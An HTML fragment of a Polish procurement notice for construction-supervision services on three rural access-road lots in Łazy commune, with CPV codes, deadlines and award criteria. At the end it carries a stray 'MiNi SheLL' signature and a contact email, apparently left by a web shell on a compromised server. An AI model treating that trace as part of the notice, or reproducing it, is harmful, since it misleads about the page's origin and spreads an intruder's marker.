<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sprawowanie funkcji inspektora 
nadzoru budowlanego - 3 zadania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprawowanie funkcji inspektora nadzoru budowlanego dla zadania: Budowa lub przebudowa (remont drogi istniejącej), wydzielonych w ramach postepowania scaleniowego, dróg dojazdowych do gruntów rolnych i leśnych oraz dojazdów do zabudowań gospodarczych poszczególnych uczestników postepowania scaleniowego dla wsi Wiesiółka o długości ok. 0,9 km w formule zaprojektuj i wybuduj realizowanego w ramach operacji pn. Scalanie gruntów rolnych na obiekcie obejmującym trzy wsie Wiesiółka, Chruszczobród Piaski oraz cz. Chruszczobrodu w gminie Łazy Powiat Zawierciański dot. działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez scalenie gruntów objętego PROW na lata 2007-2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprawowanie funkcji inspektora 
nadzoru budowlanego - 3 zadania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprawowanie funkcji inspektora nadzoru budowlanego dla zadania: Budowa lub przebudowa (remont drogi istniejącej), wydzielonych w ramach postepowania scaleniowego, dróg dojazdowych do gruntów rolnych i leśnych oraz dojazdów do zabudowań gospodarczych poszczególnych uczestników postepowania scaleniowego dla wsi Chruszczobród Piaski o długości ok. 9,8 km w formule zaprojektuj i wybuduj realizowanego w ramach operacji pn. Scalanie gruntów rolnych na obiekcie obejmującym trzy wsie Wiesiółka, Chruszczobród Piaski oraz cz. Chruszczobrodu w gminie Łazy Powiat Zawierciański dot. działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez scalenie gruntów objętego PROW na lata 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprawowanie funkcji inspektora 
nadzoru budowlanego - 3 zadania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprawowanie funkcji inspektora nadzoru budowlanego dla zadania: Budowa lub przebudowa (remont drogi istniejącej), wydzielonych w ramach postepowania scaleniowego, dróg dojazdowych do gruntów rolnych i leśnych oraz dojazdów do zabudowań gospodarczych poszczególnych uczestników postepowania scaleniowego dla części wsi Chruszczobród o długości ok. 11,22 km w formule zaprojektuj i wybuduj realizowanego w ramach operacji pn. Scalanie gruntów rolnych na obiekcie obejmującym trzy wsie Wiesiółka, Chruszczobród Piaski oraz cz. Chruszczobrodu w gminie Łazy Powiat Zawierciański dot. działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowaniem rolnictwa i leśnictwa przez scalenie gruntów objętego PROW na lata 2007-2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas reakcji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com